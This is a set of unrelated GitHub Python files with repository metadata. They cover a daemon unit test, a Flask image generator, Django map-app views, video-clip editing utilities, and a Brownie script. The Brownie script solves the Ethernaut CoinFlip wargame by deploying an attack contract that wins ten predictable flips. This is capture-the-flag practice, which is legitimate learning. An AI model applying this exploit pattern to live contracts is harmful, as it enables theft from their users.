        cls._ed._config = top.ExporterB2CConfig()
        cls._ed._config.set_cond({'tolp': '000100000000010110',
                                  'tolf': '000101100000010110',
                                  'toli': '100010000000010110'})
        cls._ed._config.set_file_bu({'tolp': 1,
                                     'tolf': 2,
                                     'tolf_nsw': 2,
                                     'tolf_vic': 2,
                                     'tolf_qld': 2,
                                     'tolf_sa': 2,
                                     'tolf_wa': 2,
                                     'tolf_act': 2,
                                     'toli': 3})
        # Signature dir.
        cls._signature_dir = tempfile.mkdtemp()
        cls._ed._config.set_signature_dir(cls._signature_dir)
        cls._sig_files = ['1.ps', '1.png', '5.ps', '5.png']
        for f in cls._sig_files:
            # Empty placeholder signature files are enough for the daemon.
            fh = open(os.path.join(cls._signature_dir, f), 'w')
            fh.close()
        # Exporter file closure dirs.
        cls._exporter_dir = tempfile.mkdtemp()
        cls._ed._config.set_exporter_dirs([cls._exporter_dir])
        cls._ed._config.set_exporter_file_formats(['.*_RE[PIF]_\d{14}\.txt$'])
        # Staging base.
        cls._staging_dir = tempfile.mkdtemp()
        cls._ed._config.set_staging_base(cls._staging_dir)
        # Archive directory.
        cls._archive_dir = tempfile.mkdtemp()
        cls._ed._config.set_archive_dir(cls._archive_dir)
        cls._ed.emailer.set_template_base(os.path.join('top', 'templates'))
        # Call up front to pre-load the DB.
        cls._ed._exporter = top.Exporter(**(cls._ed.exporter_kwargs))
        cls._ed.set_exporter_fields({'tolp': '0,1,2,3,4,5,6',
                                     'tolf': '0,1,2,3,4,5,6',
                                     'toli': '0,1,2,3,4,5,6,7'})
        db = cls._ed._exporter.db
        fixture_dir = os.path.join('top', 'tests', 'fixtures')
        fixtures = [{'db': db.agent, 'fixture': 'agents.py'},
                    {'db': db.identity_type,
                     'fixture': 'identity_type.py'},
                    {'db': db.job, 'fixture': 'jobs.py'},
                    {'db': db.jobitem, 'fixture': 'jobitems.py'}]
        for i in fixtures:
            fixture_file = os.path.join(fixture_dir, i['fixture'])
            db.load_fixture(i['db'], fixture_file)
        db.commit()
    def test_init(self):
        """Initialise an ExporterDaemon object.
        """
        msg = 'Not a top.ExporterDaemon object'
        self.assertIsInstance(self._ed, top.ExporterDaemon, msg)
    def test_start(self):
        """Start dry loop.
        """
        old_dry = self._ed.dry
        self._ed.set_dry()
        self._ed._start(self._ed.exit_event)
        # Clean up.
        self._ed.set_dry(old_dry)
        self._ed.exit_event.clear()
    def test_start_non_dry(self):
        """Start non-dry loop.
        """
        dry = False
        old_dry = self._ed.dry
        old_batch = self._ed.batch
        old_support_emails = list(self._ed.support_emails)
        # Seed the exporter dir with a report file matching the configured format.
        test_file_dir = os.path.join('top', 'tests', 'files')
        file = 'VIC_VANA_REP_20140214120000.txt'
        copy_file(os.path.join(test_file_dir, file),
                  os.path.join(self._exporter_dir, file))
        # Start processing.
        self._ed.set_dry(dry)
        self._ed.set_batch()
        # Add valid email address here if you want to verify support comms.
        self._ed.set_support_emails(None)
        self._ed._start(self._ed.exit_event)
        # Clean up.
        self._ed.set_support_emails(old_support_emails)
        self._ed.set_dry(old_dry)
        self._ed.set_batch(old_batch)
        self._ed.exit_event.clear()
    @classmethod
    def tearDownClass(cls):
        # Remove the archive artefacts the non-dry run produced.
        del cls._ed
        # Hardwired for now until we can think of a better way ...
        sig_dir_1 = os.path.join(cls._archive_dir,
                                 'signature',
                                 'c4',
                                 'c4ca',
                                 'c4ca42',
                                 'c4ca4238')
        remove_files(get_directory_files_list(sig_dir_1))
        sig_dir_5 = os.path.join(cls._archive_dir,
                                 'signature',
                                 'e4',
                                 'e4da',
                                 'e4da3b',
                                 'e4da3b7f')
        remove_files(get_directory_files_list(sig_dir_5))
        os.removedirs(sig_dir_1)
        os.removedirs(sig_dir_5)
        os.removedirs(cls._exporter_dir)
        for dir in ['priority', 'fast', 'ipec']:
            out_dir = os.path.join(cls._staging_dir, dir, 'out')
            remove_files(get_directory_files_list(out_dir))
            os.removedirs(out_dir)
| loum/top | top/tests/test_exporterdaemon.py | test_exporterdaemon.py | py | 5,280 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "unittest2.TestCase",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "top.ExporterDaemon",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "top.ExporterB2CConfig",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "temp... |
20951729685 | from flask import Flask
from flask import jsonify
from flask import send_file
from flask_cors import CORS
from PIL import Image, ImageFilter, ImageDraw, ImageFont
import glob, os
import random
import logging
import PIL
import base64
from io import BytesIO
app = Flask(__name__)
CORS(app)
def drawText(image, text, coordinates):
    """Render *text* onto *image* in black at the given (x, y) position."""
    x, y = coordinates[0], coordinates[1]
    painter = ImageDraw.Draw(image)
    painter.text((x, y), text, fill='rgb(0, 0, 0)')
@app.route('/generate', methods=['GET'])
def generate():
    """Build a random 'album cover' from the local art folder.

    Picks a random image, stamps a random album title and band name on it,
    applies a random rotation and filter, and returns the resulting PNG as
    base64-encoded bytes.
    """
    BAND_NAMES = ['Porkchop Water', 'The Beets', 'Cooper and the Footies', 'Maggie Misdemeaner Elliot']
    ALBUM_TITLES = ['Arghhh', 'I have something stuck in my throat', 'Is this real life']
    IMAGE_ANGLES = [45, 90, 180, 360]
    IMAGE_FILTERS = [
        ImageFilter.BLUR,
        ImageFilter.CONTOUR,
        ImageFilter.DETAIL,
        ImageFilter.EDGE_ENHANCE,
        ImageFilter.EDGE_ENHANCE_MORE,
        ImageFilter.EMBOSS,
        ImageFilter.FIND_EDGES,
        ImageFilter.SHARPEN,
        ImageFilter.SMOOTH,
        ImageFilter.SMOOTH_MORE
    ]
    images = glob.glob('./assets/album_art/*')
    random_image = random.choice(images)
    current_image = Image.open(random_image)
    # LANCZOS is the modern name for ANTIALIAS (which was removed in Pillow 10).
    resized_image = current_image.resize((300, 350), PIL.Image.LANCZOS)
    album_title = random.choice(ALBUM_TITLES)
    band_name = random.choice(BAND_NAMES)
    (x, y, r, b) = resized_image.getbbox()
    # Title sits near the bottom-right corner; band name at a fixed offset.
    SPACING = len(album_title) * 8
    drawText(resized_image, album_title, (r - SPACING, b - SPACING))
    drawText(resized_image, band_name, (100, 100))
    # BUG FIX: Image.rotate()/Image.filter() return NEW images; the original
    # discarded their results, so neither effect was ever applied.
    resized_image = resized_image.rotate(random.choice(IMAGE_ANGLES))
    resized_image = resized_image.filter(random.choice(IMAGE_FILTERS))
    buffered = BytesIO()
    resized_image.save(buffered, 'png', optimize=True)
    return base64.b64encode(buffered.getvalue())
if __name__ == '__main__':
    # Run Flask's built-in development server (not suitable for production).
    app.run()
{
"api_name": "flask.Flask",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "PIL.ImageDraw.Draw",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "PIL.ImageDraw",
"l... |
73152580515 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
from math import sin, cos, sqrt, atan2, radians
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
from django.core.files.storage import FileSystemStorage
from django.conf import settings
from django.http import JsonResponse
from rest_framework import viewsets
from general.models import *
from general.serializers import *
from rest_framework.decorators import detail_route
from rest_framework.response import Response
def index(request):
    """Home page: map of locations (and nearby players) within the posted
    viewport bounds, or a default Sacramento-area view on plain GET."""
    players = []
    locations = []
    if request.method == 'POST':
        center = request.POST.get('center')
        zoom = request.POST.get('zoom')
        # Viewport bounds arrive as 'lat0, lat1' / 'lng0, lng1' strings.
        # NOTE(review): a missing or malformed POST value raises here —
        # confirm the map client always sends these fields.
        lats = [float(ii) for ii in request.POST.get('lats').split(', ')]
        lngs = [float(ii) for ii in request.POST.get('lngs').split(', ')]
        if request.user.is_authenticated() and request.user.home_field:
            players = get_players_in_range(Player.objects.all(), request.user.home_field)
        # Keep only locations inside the posted bounding box.
        for loc in Location.objects.all().order_by('name'):
            if lats[0] <= loc.lat <= lats[1] and lngs[0] <= loc.lng <= lngs[1]:
                locations.append(loc)
    else:
        center = '38.60909, -121.3768'
        zoom = 11
    return render(request, 'index.html', {
        'players': players,
        'locations': locations,
        'center': center,
        'zoom': zoom
    })
@login_required(login_url='/')
def profile(request):
    """Logged-in user's dashboard: their upcoming games, players near their
    home field, and the full location list."""
    games = GameEvent.objects.filter(datetime__gte=datetime.datetime.now(), players__in=[request.user]).order_by('datetime')
    locations = Location.objects.all().order_by('name')
    players = []
    if request.user.home_field:
        players = get_players_in_range(Player.objects.all(), request.user.home_field)
    return render(request, 'profile.html', {
        'games': games,
        'players': players,
        'num_players': Player.objects.all().count(),
        'locations': locations
    })
def location(request, id):
    """Render the detail page for one Location: its upcoming games and the
    players based within range of it."""
    loc = Location.objects.get(id=id)
    upcoming_games = loc.events.filter(datetime__gte=datetime.datetime.now()).order_by('datetime')
    nearby_players = get_players_in_range(Player.objects.all(), loc)
    context = {
        'games': upcoming_games,
        'location': loc,
        'players': nearby_players,
    }
    return render(request, 'location.html', context)
def game(request, id):
    """Render the detail page for a single GameEvent."""
    event = GameEvent.objects.get(id=id)
    context = {
        'game': event,
        'players': Player.objects.all(),
    }
    return render(request, 'game.html', context)
def accept_invitation(request, code):
    """Mark the GameInvitation identified by *code* as accepted and redirect
    to its game page; any failure falls back to the home page."""
    try:
        invitation = GameInvitation.objects.get(code=code)
        invitation.is_accepted = True
        invitation.save()
        destination = '/game/{}'.format(invitation.game.id)
    except Exception:
        destination = '/'
    return redirect(destination)
class LocationViewSet(viewsets.ModelViewSet):
    """REST CRUD endpoints for Location; stamps the creating user on POST."""
    queryset = Location.objects.all()
    serializer_class = LocationSerializer
    def perform_create(self, serializer):
        # Record who created the location.
        serializer.save(created_by=self.request.user)
class GameEventViewSet(viewsets.ModelViewSet):
    """REST CRUD endpoints for GameEvent, plus join/leave actions that keep
    the players m2m and the GameInvitation records in sync."""
    queryset = GameEvent.objects.all()
    serializer_class = GameEventSerializer
    def perform_create(self, serializer):
        # Record who created the game.
        serializer.save(created_by=self.request.user)
    @detail_route(methods=['POST'])
    def join_game(self, request, *args, **kwargs):
        # Add the requester to the game and record a pre-accepted invitation.
        # NOTE(review): code="***" looks like a placeholder value — confirm.
        game = self.get_object()
        game.players.add(request.user)
        game.save()
        GameInvitation.objects.create(game=game, player=request.user, is_accepted=True, code="***")
        return Response(status=200)
    @detail_route(methods=['POST'])
    def leave_game(self, request, *args, **kwargs):
        # Remove the requester from the game and drop their invitation(s).
        game = self.get_object()
        game.players.remove(request.user)
        game.save()
        GameInvitation.objects.filter(game=game, player=request.user).delete()
        return Response(status=200)
@csrf_exempt
def upload_image(request):
    """Save an uploaded image (optionally under a 'type' subdirectory) and
    return its URL and filename as JSON.

    NOTE(review): CSRF is disabled and the stored filename comes straight
    from the client — confirm this endpoint is not exposed to untrusted users.
    """
    myfile = request.FILES['images']
    _type = request.POST.get('type', '')
    if _type:
        _type = _type + '/'
    fs = FileSystemStorage()
    filename = fs.save(_type+myfile.name, myfile)
    uploaded_file_url = fs.url(filename)
    res = {"image_url": uploaded_file_url,"image_name": uploaded_file_url.split('/')[-1]}
    return JsonResponse(res, safe=False)
def calc_distance(lat1, lon1, lat2, lon2):
    """Great-circle distance in km between two (lat, lon) points (haversine).

    Falls back to a sentinel 'far away' distance (RANGE_RADIUS * 10) when any
    coordinate is missing, so callers comparing against RANGE_RADIUS treat
    the pair as out of range.
    """
    # BUG FIX: the original tested truthiness, which wrongly treated a valid
    # 0.0 latitude/longitude (equator / prime meridian) as a missing value.
    if lat1 is not None and lon1 is not None and lat2 is not None and lon2 is not None:
        radius = 6371  # mean Earth radius, km
        dlat = radians(lat2 - lat1)
        dlon = radians(lon2 - lon1)
        a = (sin(dlat / 2) * sin(dlat / 2) +
             cos(radians(lat1)) * cos(radians(lat2)) *
             sin(dlon / 2) * sin(dlon / 2))
        c = 2 * atan2(sqrt(a), sqrt(1 - a))
        d = radius * c
        return d
    return settings.RANGE_RADIUS * 10
def get_players_in_range(players, loc):
    """Return the players whose home field lies within RANGE_RADIUS km of *loc*.

    Players without a home field are skipped.
    """
    return [
        player for player in players
        if player.home_field
        and calc_distance(loc.lat, loc.lng, player.home_field.lat, player.home_field.lng) < settings.RANGE_RADIUS
    ]
| donlafranchi/gfcmap | general/views.py | views.py | py | 5,156 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.shortcuts.render",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 50,
"usage_type": "attribute"
},
{
"api_name": "... |
23466782671 | #!/usr/bin/python3
from brownie import interface, Attack
from scripts.deploy import deploy
from scripts.helpful_scripts import get_account
from colorama import Fore
# * colours
green = Fore.GREEN
red = Fore.RED
blue = Fore.BLUE
magenta = Fore.MAGENTA
reset = Fore.RESET
# * Rinkeby address : 0xFD7a732ca213EF549696c875c2A33b400a7B5609
FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968
def guessFlip(contract_address=None, attacker=None):
    """Win 10 consecutive CoinFlip rounds by deploying the Attack contract
    (which reproduces the flip's pseudo-randomness on-chain), then clean up.

    :param contract_address: deployed CoinFlip address; when None, a fresh
        instance is deployed locally and local test accounts are used
    :param attacker: account that sends the attack transactions
    """
    # ? getting the contract
    if not contract_address:
        # from web3 import Web3
        # w3 = Web3(Web3.HTTPProvider("http://127.0.0.1:8545"))
        coinflip_contract, owner = deploy()
        contract_address = coinflip_contract.address
        # ? Geeting the accounst for local testing
        _, attacker = get_account()
    else:
        # from web3.auto.infura import w3
        coinflip_contract = interface.CoinFlip(contract_address)
    coinflip_attack = Attack.deploy(coinflip_contract, {"from": attacker})
    print(
        f"{green}Attacking contract deployed at: {magenta}{coinflip_attack.address}{reset}"
    )
    print(f"{red}Let's win this game!!{reset}")
    # Each attack() call predicts the flip, so every one of the 10 guesses wins.
    for _ in range(10):
        tx = coinflip_attack.attack(
            {"from": attacker, "gas_limit": 100000, "allow_revert": True}
        )
        tx.wait(1)
        # print(f"Current Win Streak: {coinflip_contract.consecutiveWins()}")
    print(f"{green}Final Win Streak: {red}{coinflip_contract.consecutiveWins()}{reset}")
    coinflip_attack.selfDestruct({"from": attacker})
"""
print(contract_address)
# ? variables
block_num = w3.eth.block_number
block_value = w3.eth.get_block(block_num - 1)["hash"].hex()
# print(block_num)
print(block_value)
#! for local testing
block_value = w3.eth.get_transaction_by_block(block_num - 1, 0)
block_value = "0xFD7A732CA213EF549696C875C2A33B400A7B5609"
block_value = w3.eth.get_block(block_num - 1)
block_value = w3.eth.get_transaction_by_block(block_num - 1, 0)["blockHash"].hex()
print(block_value)
print(w3.eth.get_block(block_num - 1)
exit(1)
coin_flip = int(int(block_value, 0) / FACTOR)
side = (lambda: True, lambda: False)[coin_flip == 1]()
print(coin_flip)
print(side)
exit(3)
"""
def main(contract_address=None):
    """Brownie entry point: attack an existing CoinFlip, or deploy one locally.

    NOTE(review): get_account() is unpacked as a pair elsewhere in this file,
    so passing its full return value as the attacker here may hand guessFlip
    a tuple rather than an account — confirm.
    """
    if contract_address:
        guessFlip(contract_address, get_account())
    else:
        guessFlip()
| Aviksaikat/Blockchain-CTF-Solutions | ethernaut/CoinFlip_DONE/scripts/guessFlips.py | guessFlips.py | py | 2,436 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "colorama.Fore.GREEN",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "colorama.Fore",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "colorama.Fore.RED",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "colorama.F... |
32012632909 | import os
import subprocess
import tempfile
from pathlib import Path
from typing import List
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from tqdm import tqdm
from metavideo import get_metagrid
from object_tracking_operations import (extract_masked_object_clips,
extract_obj_gifs_parallel,
extract_object_thumbs,
interpolate_missing_data,
merge_with_chromakey)
from utils import ensure_coords, ensure_dir, find_video_by_id, uniquify
def select_shots_by_entity(annotation_data: pd.DataFrame,
                           key: List[str], threshold=0.5,
                           search_categories=False,
                           padding_before=0,
                           padding_after=0):
    """
    Select shots by key entity.
    :param annotation_data: dataframe with annotation data
    :param key: key entity (or list of entities) to filter by; matched
        case-insensitively against the 'entity' (and optionally 'category') column
    :param threshold: minimum confidence score to consider
    :param search_categories: search in categories as well
    :param padding_before: seconds subtracted from each start time (floored at 0)
    :param padding_after: seconds added to each end time (capped at the latest
        known end time for the entity — presumably a proxy for the clip length,
        TODO confirm)
    :return: dataframe with selected shots
    """
    if type(key) == str:
        key = [key]
    if search_categories and 'category' not in annotation_data.columns:
        raise KeyError("The dataframe has no 'category' column")
    if 'entity' not in annotation_data.columns:
        raise KeyError("The dataframe has no 'entity' column")
    elif all(k not in annotation_data['entity'].unique() for k in key):
        raise ValueError(f"Key entity {key} not found in dataframe")
    entity_shots = annotation_data[annotation_data['entity'].str.lower().isin(key)].reset_index(drop=True)
    if search_categories:
        category_shots = annotation_data[annotation_data['category'].str.lower().isin(key)].reset_index(drop=True)
        selected_shots = pd.concat([entity_shots, category_shots]).drop_duplicates(keep='first')
    else:
        selected_shots = entity_shots
    selected_shots = selected_shots[selected_shots['confidence'] >= threshold].reset_index(drop=True)
    if padding_before:
        selected_shots['start_sec'] -= padding_before
        # Clamp padded starts so they never fall before the start of the video.
        selected_shots['start_sec'] = selected_shots['start_sec'].apply(lambda x: max(x, 0))
    if padding_after:
        end_time = entity_shots['end_sec'].max()
        selected_shots['end_sec'] += padding_after
        # BUG FIX: cap padded ends at the latest known end time with min();
        # the original used max(), which inflated EVERY shot's end to the
        # global maximum instead of clamping.
        selected_shots['end_sec'] = selected_shots['end_sec'].apply(lambda x: min(x, end_time))
    return selected_shots
def select_shots_by_keyword(annotation_data: pd.DataFrame,
                            key: List[str],
                            threshold=0.5,
                            padding_before=5,
                            padding_after=3):
    """
    Select transcript shots whose (punctuation-stripped, lowercased) word
    matches *key*, pad them with adjacent rows, and merge near-consecutive runs.

    :param annotation_data: per-word dataframe with 'word', 'confidence',
        'start_sec' and 'end_sec' columns
    :param key: keyword (or list of keywords) to match
    :param threshold: minimum confidence score to consider
    :param padding_before: max preceding rows considered as padding per match
    :param padding_after: max following rows considered as padding per match
    :return: dataframe of merged shots
    """
    key = [key.lower()] if type(key) == str else [k.lower() for k in key]
    if 'word' not in annotation_data.columns:
        raise KeyError("The dataframe has no 'word' column")
    elif all(k not in annotation_data['word'].unique() for k in key):
        raise ValueError(f"Keyword {key} not found in dataframe")
    # Strip punctuation before matching. regex=True keeps the pattern a regex
    # on pandas >= 1.4, where the default flipped to literal replacement.
    selected_shots = annotation_data[annotation_data['word'].str.lower().str.replace(r'[^\w\s]+', '', regex=True).isin(key)]
    selected_shots = selected_shots[selected_shots['confidence'] >= threshold]
    selected_shots = add_padding_shots(annotation_data, padding_after, padding_before, selected_shots)
    selected_shots = selected_shots.drop_duplicates(keep='first')
    selected_shots = selected_shots.sort_index()
    selected_shots = selected_shots.reset_index(drop=True)
    selected_shots = merge_consecutive(selected_shots)
    return selected_shots
def select_shots_by_consecutive_words(annotation_data: pd.DataFrame,
                                      key: List[str]):
    """
    Select shots where the words in *key* occur consecutively in the transcript.

    :param annotation_data: per-word dataframe with 'id', 'word', 'start_sec'
        and 'end_sec' columns; its 'word' column is normalised in place
    :param key: list of words (or one comma-separated string) that must appear
        back to back
    :return: dataframe of matches: video id, joined phrase, the phrase's time
        span, and the positional indexes of its first/last word (id0/id1)
    """
    # Normalise the key and the transcript identically: lowercase, no punctuation.
    key = [k.lower().strip() for k in key] if isinstance(key, list) else [k.lower().strip() for k in key.split(',')]
    # regex=True keeps the punctuation pattern a regex on pandas >= 1.4.
    annotation_data['word'] = annotation_data['word'].str.lower().str.replace(r'[^\w\s]+', '', regex=True).str.strip()
    matches = []
    candidate_indexes = annotation_data[annotation_data['word'].isin(key)].index.values
    for i in candidate_indexes:
        window = [i + j for j in range(len(key))]
        # BUG FIX: the original indexed past the end of the dataframe when a
        # candidate started within len(key) rows of the last row.
        if window[-1] >= len(annotation_data):
            continue
        # Accept only windows whose words match the key in order.
        if all(annotation_data.iloc[pos]['word'] == word for pos, word in zip(window, key)):
            matches.append({
                'id': annotation_data.iloc[window[0]]['id'],
                'word': ' '.join(key),
                'start_sec': annotation_data.iloc[window[0]]['start_sec'],
                'end_sec': annotation_data.iloc[window[-1]]['end_sec'],
                'id0': window[0],
                'id1': window[-1]
            })
    # DataFrame.append was removed in pandas 2.0; build the frame in one go.
    selected_shots = pd.DataFrame(matches) if matches else pd.DataFrame()
    selected_shots = selected_shots.drop_duplicates(keep='first')
    selected_shots = selected_shots.sort_index()
    return selected_shots
def merge_consecutive(selected_shots):
    """Repeatedly merge adjacent shots whose gap is at most 2 seconds,
    concatenating their words, until a pass produces no further merges.

    Mutates rows of *selected_shots* in place and resets its index each pass;
    returns the merged dataframe. Leaves a progress print on stdout.
    """
    prev_len = len(selected_shots)
    while True:
        for i, row in selected_shots.iterrows():
            if i < len(selected_shots) - 1:
                current_end = float(row['end_sec'])
                next_start = float(selected_shots.iloc[i + 1]['start_sec'])
                if 0 <= next_start - current_end <= 2:
                    # Extend this shot over the next one and absorb its words,
                    # then drop the absorbed row.
                    selected_shots.loc[i, "end_sec"] = selected_shots.iloc[i + 1]["end_sec"]
                    selected_shots.loc[i, "word"] = selected_shots.iloc[i]["word"] + " " + selected_shots.iloc[i + 1][
                        "word"]
                    selected_shots = selected_shots.drop(i + 1)
        selected_shots = selected_shots.reset_index(drop=True)
        current_len = len(selected_shots)
        print("current_len: ", current_len, end="\r")
        # Keep passing over the frame until its length stops shrinking.
        if current_len < prev_len:
            prev_len = current_len
        else:
            break
    return selected_shots
def add_padding_shots(annotation_data, padding_after, padding_before, selected_shots):
    """
    Pad each selected shot with neighbouring transcript rows whose gap to the
    shot is at most 2 seconds.

    :param annotation_data: full per-word dataframe (default positional index)
    :param padding_after: max number of following rows to consider per shot
    :param padding_before: max number of preceding rows to consider per shot
    :param selected_shots: already-selected rows; index labels are positions
        into annotation_data
    :return: selected_shots with padding rows appended (duplicates possible;
        callers deduplicate afterwards)
    """
    extra_positions = []
    for n, shot in selected_shots.iterrows():
        if n == 0:
            continue
        # Walk backwards while the previous row ends within 2s of this shot's start.
        for i in range(1, padding_before + 1):
            if n - i < 0:
                break
            if int(shot['start_sec']) - int(annotation_data.iloc[n - i]['end_sec']) <= 2:
                extra_positions.append(n - i)
            else:
                break
        # Walk forwards while the next row starts within 2s of this shot's end.
        for i in range(1, padding_after + 1):
            # BUG FIX: '>=' — the original '>' let n + i == len slip through
            # and crash iloc for shots near the end of the transcript.
            if n + i >= len(annotation_data):
                break
            if int(annotation_data.iloc[n + i]['start_sec']) - int(shot['end_sec']) <= 2:
                extra_positions.append(n + i)
            else:
                break
    if extra_positions:
        # DataFrame.append was removed in pandas 2.0; concat once at the end.
        selected_shots = pd.concat([selected_shots, annotation_data.iloc[extra_positions]])
    return selected_shots
def add_padding_to_consecutive_keywords(annotation_data, padding_after, padding_before, selected_shots):
    """
    Pad multi-word matches (as produced by select_shots_by_consecutive_words)
    with neighbouring transcript rows whose gap to the match is at most 2s.

    Unlike add_padding_shots, neighbours are taken relative to the match's
    first/last word positions ('id0'/'id1' columns) rather than its own index.
    NOTE(review): uses the removed-in-pandas-2.0 DataFrame.append and prints
    the result before returning — presumably debug leftovers; confirm.

    :return: selected_shots with the padding rows appended
    """
    for n, shot in selected_shots.iterrows():
        if n == 0:
            continue
        # Walk backwards from the first matched word.
        for i in range(1, padding_before + 1):
            if n - i < 0:
                break
            current_start = int(shot['start_sec'])
            previous_end = int(annotation_data.iloc[shot['id0'] - i]['end_sec'])
            if current_start - previous_end <= 2:
                selected_shots = selected_shots.append(annotation_data.iloc[shot['id0'] - i])
            else:
                break
        # Walk forwards from the last matched word.
        for i in range(1, padding_after + 1):
            if n + i > len(annotation_data):
                break
            current_end = int(shot['end_sec'])
            next_start = int(annotation_data.iloc[shot['id1'] + i]['start_sec'])
            diff = next_start - current_end
            if next_start - current_end <= 2:
                selected_shots = selected_shots.append(annotation_data.iloc[shot['id1'] + i])
            else:
                break
    print(selected_shots)
    return selected_shots
def extract_shots(_df: pd.DataFrame, in_dir: Path, out_dir: Path, text: str = False):
    """
    Cut each annotated shot out of its source video with ffmpeg.

    :param _df: DataFrame with data on which shots to extract; needs 'id',
        'start_sec' and 'end_sec' columns
    :param in_dir: directory containing the source videos
    :param out_dir: directory where the extracted clips are written
    :param text: optional column name whose value is burned into the clip as
        an overlay caption. NOTE(review): annotated as ``str`` but defaults
        to ``False`` and is used as a truthy flag.
    :return: None
    """
    df = _df.sort_values(by=['id', 'start_sec'])
    out_dir.mkdir(parents=True, exist_ok=True)
    for index, row in tqdm(df.iterrows(), total=df.shape[0], desc='Extracting shots'):
        # caption text: the chosen column, or the first column when no name given
        entity = row[text] if text else row[0]
        video_id = row['id']
        filename = Path(in_dir, find_video_by_id(row['id'], in_dir))
        start = "%.2f" % row['start_sec']
        end = "%.2f" % row['end_sec']
        # skip zero-length shots (string compare of the formatted timestamps)
        if start == end:
            continue
        in_path = filename.resolve().as_posix()
        out_path = uniquify(os.path.join(out_dir.as_posix(), f"{video_id}.mp4"))
        command = ["ffmpeg"]
        options = ["-i", in_path, "-ss", start, "-to", end, "-y", "-movflags",
                   "faststart", "-avoid_negative_ts", "1", "-acodec", "copy", out_path]
        if text:
            # drawtext filter: white caption in a translucent box, centred near the top
            text_filter = ["drawtext=", "fontfile=Inter-Regular.ttf:", f"text='{entity}':",
                           "fontcolor=white:", "fontsize=24:", "box=1:", "boxcolor=black@0.5:", "boxborderw=5:",
                           "x=(w-text_w)/2:", "y=24"]
            filter_args = "".join(text_filter)
            # insert the video filter right after the '-to <end>' pair
            options.insert(6, "-vf")
            options.insert(7, filter_args)
        args = command + options
        operation = subprocess.run(args, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        if operation.returncode != 0:
            # NOTE(review): stderr was redirected to DEVNULL, so this prints None
            print(operation.stderr)
            raise RuntimeError("Ué uagliù è succiesso nu guaio mentre stev tagliann e' video, liv 'a miezz "
                               "'stderr=subprocess.DEVNULL' e vir nu poc ch'è succiess")
    # TODO add threading and hardware acceleration because this can get pretty long and boring
def merge_shots(in_dir: Path, out_dir: Path):
    """
    Concatenate every .mp4 clip in ``in_dir`` into a single video.

    :param in_dir: directory containing the clips to merge
    :param out_dir: directory where the merged video is written
    :return: None
    """
    out_dir.mkdir(parents=True, exist_ok=True)
    files = [file.as_posix() for file in in_dir.glob('*.mp4')]
    # keep only files that have both an audio and a video stream
    # (ffprobe prints one codec_type line per matching stream)
    files = [file for file in files if len(subprocess.run(
        ["ffprobe", "-v", "error", "-select_streams", "a:0", "-show_entries", "stream=codec_type", "-of",
         "default=noprint_wrappers=1:nokey=1", file],
        stdout=subprocess.PIPE).stdout.decode('utf-8').splitlines()) > 0 and len(subprocess.run(
        ["ffprobe", "-v", "error", "-select_streams", "v:0", "-show_entries", "stream=codec_type", "-of",
         "default=noprint_wrappers=1:nokey=1", file],
        stdout=subprocess.PIPE).stdout.decode('utf-8').splitlines()) > 0]
    files.sort()
    out_path = uniquify(Path(out_dir, 'merged.mp4').as_posix())
    command = ["ffmpeg"]
    input_files = [["-i", file] for file in files]
    # flatten [["-i", f], ...] into ["-i", f, "-i", f, ...]
    input_files = [item for sublist in input_files for item in sublist]
    # one "[i:v][i:a]" pair per input, all fed into the concat filter
    streams = [f"[{i}:v][{i}:a]" for i in range(len(files))]
    concat = [f"concat=n={len(files)}:v=1:a=1[v][a]"]
    mapper = ['-map', '[v]', '-map', '[a]']
    sync = ["-vsync", "2", '-threads', '0']
    options = input_files + ["-filter_complex"] + [f"{''.join(streams + concat)}"] + mapper + sync + [out_path]
    args = command + options
    print(args)
    operation = subprocess.run(args, stdout=subprocess.DEVNULL)
def agnostic_merge(video_dir, output_dir):
    """
    Concatenate every .mp4 in ``video_dir``, normalising each clip to
    1280x720 (letterboxed) so inputs with different resolutions and aspect
    ratios can be joined by ffmpeg's concat filter.

    NOTE(review): unlike merge_shots, the input list is not sorted — the
    clip order follows os.listdir.

    :param video_dir: directory containing the clips to merge
    :param output_dir: directory where the merged video is written
    """
    output_directory = ensure_dir(output_dir)
    files = [os.path.join(video_dir, file) for file in os.listdir(video_dir) if file.endswith('.mp4')]
    out_path = uniquify(os.path.join(output_directory, 'merged.mp4'))
    command = ["ffmpeg"]
    input_files = [["-i", file] for file in files]
    input_files = [item for sublist in input_files for item in sublist]
    # scale each input to fit 1280x720, pad to centre it, and reset the SAR
    aspect_ratio_handler = [
        f'[{i}]scale=1280:720:force_original_aspect_ratio=decrease,pad=1280:720:(ow-iw)/2:(oh-ih)/2,setsar=1[v{i}];' for
        i in range(len(files))]
    streams = [f'[v{i}][{i}:a:0]' for i in range(len(files))]
    concat = [f"concat=n={len(files)}:v=1:a=1[v][a]"]
    mapper = ['-map', '[v]', '-map', '[a]']
    sync = ["-vsync", "2"]
    options = input_files + ["-filter_complex"] + [
        f"{''.join(aspect_ratio_handler + streams + concat)}"] + mapper + sync + [out_path]
    args = command + options
    subprocess.run(args, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def render_heatmap(out_dir: Path, data: pd.DataFrame, key: list, **kwargs) -> None:
    """
    Render a heatmap of bounding-box density for the selected object names.

    :param out_dir: folder where to save the heatmap
    :param data: DataFrame with object tracking rows; needs 'object_name',
        'left', 'top', 'right', 'bottom' and 'id' columns
    :param key: list of object names to include in the heatmap
    :keyword resolution: tuple(width, height), defaults to (1920, 1080)
